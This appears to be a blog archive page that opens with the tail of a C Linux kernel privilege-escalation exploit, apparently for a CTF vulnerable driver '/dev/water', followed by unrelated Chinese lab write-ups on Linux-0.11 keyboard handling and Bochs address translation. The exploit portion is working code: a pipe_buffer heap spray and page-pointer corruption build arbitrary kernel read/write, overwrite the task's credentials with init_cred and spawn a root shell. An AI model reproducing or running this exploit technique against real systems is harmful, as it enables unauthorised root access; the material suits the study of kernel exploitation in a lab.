puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

exit(EXIT_SUCCESS);
}


struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#define PIPE_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int self_4th_pipe_idx = -1;
int self_2nd_pipe_idx = -1;
int self_3rd_pipe_idx = -1;
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
char temp_zero_buf[0x1000] = {'\0'};

int pipe_list[PIPE_NUM][2];

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_list[self_2nd_pipe_idx][1], src, len);
}

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

int main() {
save_status();
bind_core(0);

int fd = open("/dev/water",O_RDWR);
char buf[0x200];

memset(buf,0x31,0x200);
ioctl(fd,0x20,&buf);
ioctl(fd,0x30,&buf);

for(int i = 0; i < PIPE_NUM; i++){
if(pipe(pipe_list[i]) == -1){
errPrint("pipe");
}
}

for (int i = 0; i < PIPE_NUM; i++){
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 8) < 0){
/* 8 * pipe_buffer = 0x180 kmalloc-512 */
errPrint("fcntl");
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_list[i][1], "AAAAAAAA", 8); // tag
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], "AAAAAAAA", 8);
write(pipe_list[i][1], "BBBBBBBB", 8);
}

memset(buf,0,0x200);
ioctl(fd,0x50,&buf); /* 覆盖pipe_buffer->page末尾字节 */

int victim_idx = -1;
int orig_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){
char tag[0x10];
int nr;
memset(tag, 0, sizeof(tag));
read(pipe_list[i][0], tag, 8);
read(pipe_list[i][0], &nr, sizeof(int));
if (!strcmp(tag, "AAAAAAAA") && nr != i){
orig_idx = nr;
victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
}
}
if (orig_idx == -1 || victim_idx == -1){
errPrint("can't find");
}

struct pipe_buffer info_pipe_buf;
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf,'p',sizeof(buf));
write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
close(pipe_list[orig_idx][0]); /* 释放其中一个pipe_buffer */
close(pipe_list[orig_idx][1]);

//sleep(2);

puts("write down");

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx){
continue;
}
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
/* 2 * pipe_buffer = 0x60 kmalloc-96 */
errPrint("Fcntl Pipe");
}
}

memset(buf,0,sizeof(buf));
read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
print_hex(buf,SND_PIPE_BUF_SZ - 8);
read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

//sleep(2);

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
puts("change pipe_buffer down");

//sleep(2);

int snd_orig_idx = -1;
int snd_victim_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){ /* 第二次堆喷 */
int nr;
if (i == orig_idx || i == victim_idx){
continue;
}
read(pipe_list[i][0], &nr, sizeof(int));
if (i < PIPE_NUM && i != nr){
snd_orig_idx = nr;
snd_victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
}
}

if (snd_orig_idx == -1 || snd_victim_idx == -1){
errPrint("can't find");
}

size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf,'k',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
close(pipe_list[snd_orig_idx][0]);
close(pipe_list[snd_orig_idx][1]);

puts("write down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
/* 4 * pipe_buffer = 0xc0 kmalloc-192 */
errPrint("Fcntl Pipe");
}
}

puts("fcntl down");
//sleep(2);

evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_2nd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
self_2nd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'n',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_3rd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'m',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_4th_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_idx);
break;
}
}

memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;

//sleep(2);
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
puts("change pipe_buffer down");
//sleep(2);

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;

vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
for (;;)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);

if (*(uint64_t *)buf > 0xffffffff81000000 && ((*(uint64_t *)buf & 0xfff) == 0x0e0))
{
kernel_base = *(uint64_t *)buf - 0x0e0;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);


uint64_t parent_task, current_task;
puts("[*] Seeking task_struct in memory...");

uint64_t *comm_addr = 0;
uint64_t *point_buf = malloc(0x1000);

char target[0x20];
strcpy(target, "8888888888");
if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0){
errPrint("cannot set name");
}

for (int i = 0; 1; i++)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

comm_addr = memmem(point_buf, 0xf00, target, 0xd);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) && (comm_addr[-3] > 0xffff888000000000) && (comm_addr[-57] > 0xffff888000000000) && (comm_addr[-56] > 0xffff888000))
{

parent_task = comm_addr[-60];

current_task = comm_addr[-54] - 2528;
page_offset_base = (comm_addr[-54] & 0xfffffffffffff000) - i * 0x1000;
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page *)(vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
"0x%lx\n\n",
current_task);
break;
}
}

size_t *tsk_buf;
uint64_t init_task = 0xffffffff83011200+kernel_offset;
uint64_t init_cred = 0xffffffff8308c620+kernel_offset;
uint64_t init_nsproxy = 0xffffffff8308c140+kernel_offset;

printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

puts("[*] Escalating ROOT privilege now...");

size_t current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
tsk_buf[367] = init_cred;
tsk_buf[368] = init_cred;
tsk_buf[381] = init_nsproxy;

arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40),&buf[512 * 8], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_root();

return 0;
}

HIT-OSLab7

实验目的:

  • 加深对操作系统设备管理基本原理的认识,了解键盘中断、扫描码等概念
  • 通过实践掌握 Linux-0.11 对键盘终端和显示器终端的处理过程

实验内容:

  • 本实验的基本内容是修改 Linux-0.11 的终端设备处理代码,对键盘输入和字符显示进行非常规的控制
  • 在初始状态,一切如常,用户按一次 F12 后,把应用程序向终端输出所有字母都替换为 *
  • 再按一次 F12,又恢复正常
  • 第三次按 F12,再进行输出替换,依此类推

实验过程

终端设备是计算机系统中与用户交互的硬件设备,通常使用键盘和显示器来接收用户的输入和输出操作

在 Linux 系统中,每个终端设备都对应一个 tty_struct 结构体实例,用于存储该终端设备的状态、配置信息以及与终端相关的数据结构

1
2
3
4
5
6
7
8
9
10
struct tty_struct
{
struct termios termios; /* 存储终端设备的属性 */
int pgrp; /* 存储该终端设备所属的进程组 */
int stopped; /* 表示该终端设备是否处于停止状态 */
void (*write)(struct tty_struct *tty); /* 处理终端设备的写操作 */
struct tty_queue read_q; /* 存储终端设备的输入缓冲区(来自键盘输入的数据) */
struct tty_queue write_q; /* 存储终端设备的输出缓冲区(屏幕将会输出的数据) */
struct tty_queue secondary; /* 存储终端设备的次要缓冲区(来自网络或其他设备的输入数据) */
};
1
2
3
4
5
6
7
8
struct tty_queue
{
unsigned long data;
unsigned long head; /* 存储队列中的头指针 */
unsigned long tail; /* 存储队列中的尾指针 */
struct task_struct *proc_list; /* 指向一个任务结构体列表 */
char buf[TTY_BUF_SIZE]; /* 存储队列中的数据缓冲区 */
};

扫描码是指计算机在接收用户的输入时,将用户的输入转换为计算机能够理解的形式,在键盘上,每个键都对应一个唯一的扫描码,这个扫描码可以用来识别用户按下的是哪个键

在操作系统中,键盘中断通常是通过中断处理程序(Interrupt Handler)来实现的

  • 当用户按下键盘上的键时,计算机系统会向操作系统发送一个中断信号,操作系统接收到这个信号后,会调用相应的中断处理程序来处理这个中断事件

下面是键盘中断的处理程序代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
keyboard_interrupt:
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
push %ds
push %es
movl $0x10,%eax /* eax中是扫描码 */
mov %ax,%ds
mov %ax,%es
xor %al,%al
inb $0x60,%al
cmpb $0xe0,%al
je set_e0
cmpb $0xe1,%al
je set_e1
call key_table(,%eax,4) /* 调用键处理程序"ker_table+eax*4" */
movb $0,e0
e0_e1: inb $0x61,%al
jmp 1f
1: jmp 1f
1: orb $0x80,%al
jmp 1f
1: jmp 1f
1: outb %al,$0x61
jmp 1f
1: jmp 1f
1: andb $0x7F,%al
outb %al,$0x61
movb $0x20,%al
outb %al,$0x20
pushl $0
call do_tty_interrupt /* 将收到的数据复制成规范模式数据并存放在规范字符缓冲队列中 */
addl $4,%esp
pop %es
pop %ds
popl %edx
popl %ecx
popl %ebx
popl %eax
iret
set_e0: movb $1,e0
jmp e0_e1
set_e1: movb $2,e0
jmp e0_e1

其中 key_table 存储有各个扫描码的处理程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
key_table:
.long none,do_self,do_self,do_self /* 00-03 s0 esc 1 2 */
.long do_self,do_self,do_self,do_self /* 04-07 3 4 5 6 */
.long do_self,do_self,do_self,do_self /* 08-0B 7 8 9 0 */
.long do_self,do_self,do_self,do_self /* 0C-0F + ' bs tab */
......
.long func,func,func,func /* 3C-3F f2 f3 f4 f5 */
.long func,func,func,func /* 40-43 f6 f7 f8 f9 */
.long func,num,scroll,cursor /* 44-47 f10 num scr home */
.long cursor,cursor,do_self,cursor /* 48-4B up pgup - left */
.long cursor,cursor,do_self,cursor /* 4C-4F n5 right + end */
.long cursor,cursor,cursor,cursor /* 50-53 dn pgdn ins del */
.long none,none,do_self,func /* 54-57 sysreq ? < f11 */
.long func,none,none,none /* 58-5B f12 ? ? ? */
......
  • 我们可以发现 F12 会调用 func 函数

核心思路就是添加一个 F12 标记位,我们可以选择将 func 替换为我们需要的函数,其目的是修改该标记位以记录用户是否输入了 F12

1
2
3
4
5
int f12_key = 0;
void change_f12_key(void)
{
f12_key ^= 1;
}
1
.long change_f12_key,none,none,none		/* 58-5B f12 ? ? ? */

函数 con_write 用于将字符串写入终端设备:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
void con_write(struct tty_struct * tty)
{
int nr;
char c;

nr = CHARS(tty->write_q);
while (nr--) {
GETCH(tty->write_q,c);
switch(state) {
case 0:
if (c>31 && c<127) {
if (x>=video_num_columns) {
x -= video_num_columns;
pos -= video_size_row;
lf();
}
/* 将write_q的字符放入显存的汇编代码 */
__asm__("movb attr,%%ah\n\t"
"movw %%ax,%1\n\t"
::"a" (c),"m" (*(short *)pos)
);
pos += 2;
x++;
} else if (c==27)
  • case 0 用于处理 asicc 在 (31,127) 范围的字符
  • 我们需要在这段代码前检查 f12_key 并将字符设置为 *
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void con_write(struct tty_struct * tty)
{
int nr;
char c;

nr = CHARS(tty->write_q);
while (nr--) {
GETCH(tty->write_q,c);
switch(state) {
case 0:
if (c>31 && c<127) {
if (x>=video_num_columns) {
x -= video_num_columns;
pos -= video_size_row;
lf();
}
if(f12_key == 1 && ( (c >= 48 && c<= 57) || (c>=65 && c<=90) || (c>=97 && c<=122) ) )
c = '*';

__asm__("movb attr,%%ah\n\t"
"movw %%ax,%1\n\t"
::"a" (c),"m" (*(short *)pos)
);
pos += 2;
x++;
} else if (c==27)

最终效果如下:

HIT-OSLab6

实验目的:

  • 深入理解操作系统的段、页式内存管理,深入理解段表、页表、逻辑地址、线性地址、物理地址等概念
  • 实现段、页式内存管理的地址映射过程
  • 编程实现段、页式内存管理上的内存共享,从而深入理解操作系统的内存管理

实验内容:

  • 用 Bochs 调试工具跟踪 Linux-0.11 的地址翻译(地址映射)过程,了解 IA-32(Intel Architecture 32-bit) 的CPU架构下的地址翻译
  • 在 Linux-0.11 中实现 Linux-0.11 的内存管理机制,具体来说就是实现如下3个系统调用:
    • sys_shmget:获取一个共享内存块
    • sys_shmat:映射一个共享内存块
  • 在 Ubuntu 上编写多进程的生产者-消费者程序,用共享内存做缓冲区(上一个实验是用文件做缓冲区)
  • 在上一个实验(信号量的实现和在 pc.c 程序上的应用)的基础上,为 Linux-0.11 增加共享内存功能,并将生产者-消费者程序移植到 Linux-0.11

实验过程

本实验基于上个实验,因此需要保存上个实验的代码

逻辑地址,虚拟地址,线性地址,物理地址是计算机内存管理中的重要概念:

  • 逻辑地址:
    • 逻辑地址是程序使用的地址
    • 编译器编译程序时,会为程序生成代码段和数据段,然后将所有代码放到代码段中,将所有数据放到数据段中,最后程序中的每句代码和每条数据都会有自己的逻辑地址
  • 虚拟地址:
    • 虚拟地址是操作系统为每个进程分配的地址空间,保证了进程之间的隔离和安全性
  • 线性地址:
    • 由虚拟地址通过 “分段” / “分页” 机制转换而来的地址
  • 物理地址:
    • 物理地址是指内存中的实际地址,它是硬件访问的地址
    • 如果 CPU 没有分页机制,那么线性地址等于物理地址
    • 如果 CPU 有分页机制,那么线性地址必须通过转换才能变成物理地址

逻辑地址,虚拟地址,线性地址,物理地址之间的关系是:

  • 在程序编写时,汇编指令使用的地址为逻辑地址(编译器为各个符号分配的地址)
  • 当程序被加载到内存中时,操作系统会将逻辑地址转化为虚拟地址
  • 在 x86 架构中:
    • 虚拟地址通过段选择器和段描述符转化为线性地址
    • 线性地址通过页表转化为物理地址

实验要求跟踪调试 Linux-0.11 的地址映射过程,测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
#include <stdio.h>

int i = 0x12345678;

int main(void)
{
printf("LQD The logical/virtual address of i is 0x%08x", &i);
fflush(stdout);

while (i);

return 0;
}
  • 运行后程序死循环

我们的目标就是调试分析变量 i 的物理地址,修改该地址使程序停止死循环:

  • 程序运行之后输出的 0x3004 就是变量 i 的虚拟地址

线性地址由段选择器和段描述符计算而来,因此我们需要先查找到段描述符

进程的段描述符记录在该进程的 LDT 表中,而 LDT 表则记录在 GDT 表中(LDTR 寄存器记录 LDT 表存放在 GDT 表的位置,GDTR 寄存器则记录有 GDT 表的物理地址)

sreg 命令可以显示所有寄存器的信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<bochs:3> sreg
es:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
cs:0x000f, dh=0x10c0fb00, dl=0x00000002, valid=1
Code segment, base=0x10000000, limit=0x00002fff, Execute/Read, Non-Conforming, Accessed, 32-bit
ss:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
ds:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=3
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
fs:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
gs:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
ldtr:0x0068, dh=0x000082fe, dl=0x92d00068, valid=1
tr:0x0060, dh=0x00008bfe, dl=0x92e80068, valid=1
gdtr:base=0x0000000000005cb8, limit=0x7ff
idtr:base=0x00000000000054b8, limit=0x7ff
  • GDTR 寄存器中的值为 0x5cb8
  • LDTR 寄存器中的值为 0x0068
  • DS 寄存器中的值为 0x0017(0b000000000010111,索引值为 0b10

xp 命令可以打印指定内存的数据:

  • 查看 GDT 表信息,LDT 表的物理地址为 0xfe92d0
1
2
3
4
<bochs:5> xp /8w 0x00005cb8+0x68
[bochs]:
0x0000000000005d20 <bogus+ 0>: 0x92d00068 0x000082fe 0xb2e80068 0x000089f8
0x0000000000005d30 <bogus+ 16>: 0xb2d00068 0x000082f8 0x00000000 0x00000000
  • 查看对应 LDT 表信息,DS 段的索引为 0x2,对应 0x00003fff 0x10c0f300
1
2
3
4
<bochs:6> xp /8w 0xfe92d0
[bochs]:
0x0000000000fe92d0 <bogus+ 0>: 0x00000000 0x00000000 0x00000002 0x10c0fb00
0x0000000000fe92e0 <bogus+ 16>: 0x00003fff 0x10c0f300 0x00000000 0x00fea000

段描述符的结构如下:

  • 段基址由3部分组合而成:[0,8),[24,32),[48,64)
1
2
bin(0x00003fff10c0f300) =>
0b[0000000000000000]0011111111111111[00010000]1100000011110011[00000000]
  • 计算得基地址为 0x10000000
  • 因此线性地址为 0x10003004
1
2
In [1]: hex(0b00010000000000000000000000000000)
Out[1]: '0x10000000'

calc 命令验证线性地址是否正确:

1
2
<bochs:7> calc ds:0x3004
0x10003004 268447748

线性地址的结构如下:

1
2
bin(0x10003004) =>
0b[1000000][0000000011][000000000100]
  • 0-11:页内偏移 - 4
  • 12-21:页表索引 - 3
  • 22-31:页目录索引 - 64(二级页表索引)

在 IA-32(英特尔的32位CPU架构) 下,页目录表的位置由 CR3 寄存器指引,用 creg 命令可以看到:

1
2
3
4
5
6
7
8
9
<bochs:2> creg
CR0=0x8000001b: PG cd nw ac wp ne ET TS em MP PE
CR2=page fault laddr=0x0000000010002fb0
CR3=0x000000000000
PCD=page-level cache disable=0
PWT=page-level write-through=0
CR4=0x00000000: cet pke smap smep osxsave pcid fsgsbase smx vmx osxmmexcpt umip osfxsr pce pge mce pae pse de tsd pvi vme
CR8: 0x0
EFER=0x00000000: ffxsr nxe lma lme sce
  • 页目录表所在物理地址为 0x0
  • 页目录表和页表中的内容很简单,是1024个32位数,这32位中前20位是物理页框号,后面是一些属性信息(最重要的是最后一位P)
1
2
3
4
5
<bochs:4> xp /8w 0+64*4
[bochs]:
0x0000000000000100 <bogus+ 0>: 0x00fa6027 0x00000000 0x00000000 0x00000000
0x0000000000000110 <bogus+ 16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x0000000000000120 <bogus+ 32>: 0x00000000 0x00000000 0x00000000 0x00000000
  • 页表所在的物理页框号为 0x00fa6,即页表在物理内存为 0x00fa6000
1
2
3
4
<bochs:5> xp /8w 0x00fa6000 + 3*4
[bochs]:
0x0000000000fa600c <bogus+ 0>: 0x00f99067 0x00000000 0x00000000 0x00000000
0x0000000000fa601c <bogus+ 16>: 0x00000000 0x00000000 0x00000000 0x00000000
  • 物理页所在的物理页框号为 0x00f99,即物理页在物理内存为 0x00f99000
  • 因此变量 i 的物理地址为 0x00f99004

page 命令验证物理地址是否正确:

1
2
3
4
<bochs:6> page 0x10003004
PDE: 0x0000000000fa6027 ps A pcd pwt U W P
PTE: 0x0000000000f99067 g pat D A pcd pwt U W P
linear page 0x0000000010003000 maps to physical page 0x000000f99000

打印该地址的数据即可发现 0x12345678

1
2
3
<bochs:8> xp /w 0x00f99004
[bochs]:
0x0000000000f99004 <bogus+ 0>: 0x12345678

最后使用 setpmem 命令修改内存即可:

1
2
3
4
<bochs:10> setpmem 0x00f99004 4 0
<bochs:11> xp /w 0x00f99004
[bochs]:
0x0000000000f99004 <bogus+ 0>: 0x00000000
  • 程序成功退出

Linux 和 Unix 系统中,共享内存(Shared Memory)是一种在多进程环境下实现进程间通信的技术,它允许多个进程同时访问同一块内存区域,从而实现数据的共享和通信

在为 linux-0.11 编写共享内存代码前,我们需要先分析一下 linux-0.11 对页面的管理机制

1
2
3
#define PAGING_MEMORY (15*1024*1024)
#define PAGING_PAGES (PAGING_MEMORY>>12)
static unsigned char mem_map [ PAGING_PAGES ] = {0,};
  • mem_map 是一个全局数组,在 Linux 0.11 中用于存储物理内存的映射
  • 其索引代表线性地址,每个元素代表一个物理页框

在 Linux-0.11 中,物理内存由一系列页框组成,每个页框的大小为 4KB,mem_map 数组存储了所有已经分配的物理页框的地址,当进程需要分配内存时,会从 mem_map 中查找一个空闲的页框,将其分配给进程,并将该页框的地址返回给进程

初始化 mem_map 数组的函数为 mem_init,在 swapper 进程中会调用一次:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define MAP_NR(addr) (((addr)-LOW_MEM)>>12)
#define USED 100

void mem_init(long start_mem, long end_mem)
{
int i;

HIGH_MEMORY = end_mem;
for (i=0 ; i<PAGING_PAGES ; i++)
mem_map[i] = USED;
i = MAP_NR(start_mem);
end_mem -= start_mem;
end_mem >>= 12;
while (end_mem-->0)
mem_map[i++]=0;
}

空闲页面分配的函数 get_free_page 代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#define LOW_MEM 0x100000
unsigned long get_free_page(void) /* 获取一个空闲页 */
{
register unsigned long __res asm("ax");

__asm__("std ; repne ; scasb\n\t" /* 查找一个末尾为"\0"的page,记录在edi中 */
"jne 1f\n\t" /* 如果scasb指令返回非零值,说明页框已经被占用 */
"movb $1,1(%%edi)\n\t" /* [edi+1]=1,对应页面设置为'1' */
"sall $12,%%ecx\n\t"
"addl %2,%%ecx\n\t"
"movl %%ecx,%%edx\n\t"
"movl $1024,%%ecx\n\t"
"leal 4092(%%edx),%%edi\n\t"
"rep ; stosl\n\t"
"movl %%edx,%%eax\n"
"1:"
:"=a" (__res)
:"0" (0),"i" (LOW_MEM),"c" (PAGING_PAGES), /* 设置i为LOW_MEM(从LOW_MEM开始计数) */
"D" (mem_map+PAGING_PAGES-1)
);
return __res;
}
  • repne scasb 用于将寄存器的内容与内存中的数据进行比较(一直重复直到 edi 末尾为 “\0”)
  • 核心操作就是遍历一遍 mem_map,返回合适的空闲页面

释放已分配页面的函数 get_free_page 代码如下:

1
2
3
4
5
6
7
8
9
10
11
void free_page(unsigned long addr)
{
if (addr < LOW_MEM) return;
if (addr >= HIGH_MEMORY)
panic("trying to free nonexistent page");
addr -= LOW_MEM;
addr >>= 12;
if (mem_map[addr]--) return;
mem_map[addr]=0;
panic("trying to free free page");
}
  • 将对应的 mem_map[addr] 末尾置为 “\x00”

函数 put_page 用于将线性地址与物理页进行映射,其实现如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
unsigned long put_page(unsigned long page,unsigned long address)
{
unsigned long tmp, *page_table;

/* NOTE !!! This uses the fact that _pg_dir=0 */

if (page < LOW_MEM || page >= HIGH_MEMORY)
printk("Trying to put page %p at %p\n",page,address);
if (mem_map[(page-LOW_MEM)>>12] != 1)
printk("mem_map disagrees with %p at %p\n",page,address);
page_table = (unsigned long *) ((address>>20) & 0xffc);
if ((*page_table)&1)
page_table = (unsigned long *) (0xfffff000 & *page_table);
else {
